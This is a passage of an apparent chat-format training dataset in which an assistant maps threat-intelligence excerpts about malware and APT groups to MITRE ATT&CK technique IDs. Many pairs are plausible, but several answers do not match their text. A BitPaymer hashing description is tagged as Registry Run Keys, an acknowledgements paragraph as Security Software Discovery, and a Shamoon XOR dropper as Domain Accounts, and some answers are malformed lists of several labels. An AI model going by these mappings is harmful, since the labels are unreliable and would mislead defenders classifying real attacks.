- "role": "user",
- "content": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can detect the victim's file or folder list."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can retrieve network information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk is designed to run with high privileges, this time it registers itself as a service under Plug-And-Play Support name"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has been executed via malicious MS Word e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The key descriptor’s string contains Bayren_Munchen which seems likely to refer to the German soccer team FC Bayern Munich. Regardless, it is not the content of the key descriptor – but its length – that matters, with that length used to retrieve the XOR key used to encrypt the payload"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire includes various modules to attempt to bypass UAC for escalation of privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 uses HTTPS to conceal C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Forfiles can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before)."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition, although the 2017 campaign has been documented, during our research regarding MirageFox, we found a recently uploaded binary (6/8/2018) from the 2017 campaign, pretty much identical to a RAT mentioned in their RoyalAPT report, barely detected with only 7/66 detections on VirusTotal. APT15 Code Reuse We found the new version of the RAT on VirusTotal hunting, by a YARA signature we created based off code only found in Mirage and Reaver, both attributed to Chinese government affiliated groups"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Those payloads consist of a legitimate and signed Microsoft executable used as a DLL search-order hijacking host and a malicious DLL loaded by that executable. The malicious DLL is a ShadowPad loader"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can enumerate files on a target system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has enumerated processes by ID, name, or privileges."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has downloaded additional Lua scripts from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions."
- },
- {
- "role": "assistant",
- "content": "T1565.001 - Stored Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can check for the Telegram installation directory by enumerating the files on disk."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can take JPEG screenshots of an infected system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has named component DLLs \"RapportGP.dll\" to match those used by the security company Trusteer."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can monitor processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto uses the \"zip -r\" command to compress the data collected on the local system."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments"
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff MD5 1ff40e79d673461cd33bd8b68f8bb5b8 Compiled 2017.08.06 11:32:36 (GMT), 2.22 Type I386 Windows Console EXE Size 101 888 Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters: Parameter Description -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla used \"net use\" commands to connect to lateral systems within a network."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon has been seen overwriting features of disk structure such as the MBR."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can upload data and files from a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can use RunDLL32 for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used the Exchange Power Shell module \"Set-OabVirtualDirectoryPowerShell\" to export mailbox data."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection"
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel uses RC4 for encrypting the configuration."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One legitimate executable, sometimes signed, and vulnerable to dynamic-link library (DLL) sideloading - One malicious DLL loaded by the legitimate file - One binary file usually containing obfuscated code, unpacked in memory by the malicious DLL"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK is capable of performing remote file transmission."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values. InvisiMole also has a built-in command to modify file times."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo can enumerate all windows on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has used FTP for C2 connections."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine. The stager will be described in more detail in the next section"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"net user /domain\" to enumerate domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "was distributed through a compromised update to a Tor client with a coin miner payload."
- },
- {
- "role": "assistant",
- "content": "T1195 - Supply Chain Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gets an output of running processes using the tasklist command."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail can invoke Apple APIs \"contentsOfDirectoryAtPath\", \"pathExtension\", and (string) \"compare\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of our investigation, we monitored exactly what the cybercriminals did on an infected PC. In particular, they they downloaded an auxiliary program ff._exe to the Config.Msi folder on the infected machine"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST request"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module"
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer uses custom encryption for C2 that uses 3DES."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can run `C:\\Windows\\system32\\cmd.exe /c cmd /c ipconfig /all 2>&1` to discover network settings."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collected data from local victim systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The older “mode” variant of BitPaymer uses the Windows registry for persistence, while the newer service variant will attempt to install itself as a service"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can crash a debugger by passing a format string to \"OutputDebugStringA()\"."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can gather information about the user on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can use Rundll32 to execute additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts exfiltrated data with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon Group obtains and saves information about victim network interfaces and addresses."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT12 has used blogs and WordPress for C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Regin appears to have functionality to modify remote Registry information."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aoqin Dragon has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.\tUrsnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
